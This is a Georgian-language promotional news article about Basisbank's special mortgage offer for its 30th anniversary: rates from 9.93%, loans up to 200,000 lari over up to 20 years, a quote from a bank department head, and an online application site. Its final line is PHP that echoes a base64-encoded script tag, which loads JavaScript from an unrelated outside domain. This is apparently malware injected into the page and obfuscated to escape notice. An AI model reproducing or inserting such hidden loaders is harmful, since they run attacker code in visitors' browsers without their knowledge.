celsiusi
ავერსი საქკაბელი

 ახალი წელი ახალ გეგმებსა და მიზნებს უკავშირდება. უამრავი ადამიანი ცდილობს, ახალ წელს ახალ სახლში შეხვდეს ან უკვე არსებულ ბინაში სიახლე შეიტანოს. თუმცა ახალი სახლის სიხარული მაინც სულ სხვაა. ეს ფაქტი თითქოს რაღაც დიდისა და მნიშვნელოვანის დასაწყისთან ასოცირდება.

სწორედ ასეთი განსაკუთრებული სიხარულის შესაქმნელად ბაზისბანკმა მომხმარებლებს ახალი შეთავაზება მოუმზადა. იპოთეკურ სესხზე სპეციალური შეთავაზების ფარგლებში ახალი ბინის შეძენის, აშენების, გარემონტების ან სხვა ბანკებში არსებული იპოთეკური სესხის გადასაფარად, სესხით სარგებლობა გაუმჯობესებული და ინდივიდუალური პირობებით არის შესაძლებელი.

ბაზისბანკის პროდუქტებისა და სერვისების განვითარების დეპარტამენტის უფროსის, მარეხ საჯაიას განმარტებით, ბანკში მუდმივად მიმდინარეობს მუშაობა ახალი პროდუქტების შეთავაზებასა და არსებულის დახვეწაზე.

„ბაზისბანკში აქტიურ რეჟიმში ვმუშაობთ, რომ მომხმარებელს მათ საჭიროებებზე მორგებული პროდუქტი შევთავაზოთ და მათი საბანკო გამოცდილება ჩვენთან კიდევ უფრო სასიამოვნო და კომფორტული გავხადოთ. ამჯერად, სპეციალური შეთავაზების ფარგლებში, ჩვენს მომხმარებელს შესაძლებლობა აქვს, იპოთეკურ სესხზე ისარგებლოს ბაზისბანკის საუკეთესო პირობებით და დარწმუნებული ვარ, რომ საკმაოდ ბევრ მომხმარებელს ექნება შესაძლებლობა ჩვენი მეშვეობით შეიძინოს ან გაარემონტოს უძრავი ქონება“, - განმარტავს მარეხ საჯაია.

სესხის წლიური საპროცენტო განაკვეთი ლარში 9.93%-დან, ხოლო ეფექტური საპროცენტო განაკვეთი - 12.59%-დან განისაზღვრება. მომხმარებელს სესხით სარგებლობა 200 000 ლარამდე, მაქსიმუმ 20 წლამდე ვადით შეუძლია.

წელს, ბაზისბანკი წარმატების 30-წლიან იუბილეს აღნიშნავს და ამ თარიღთან დაკავშირებით მომხმარებლებისთვის აქციები და დამატებითი შეთავაზებები იქნება ხელმისაწვდომი. გაუმჯობესებული და ყველაზე მიმზიდველი პირობებით იპოთეკური სესხით სარგებლობის შესაძლებლობა კი პირველია.

იპოთეკურ სესხზე სპეციალური შეთავაზებით სარგებლობისთვის განაცხადის შევსება შესაძლებელია ონლაინ, სესხების პლატფორმაზე bbcredit.ge ან ბანკის ნებისმიერ ფილიალში.

257
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");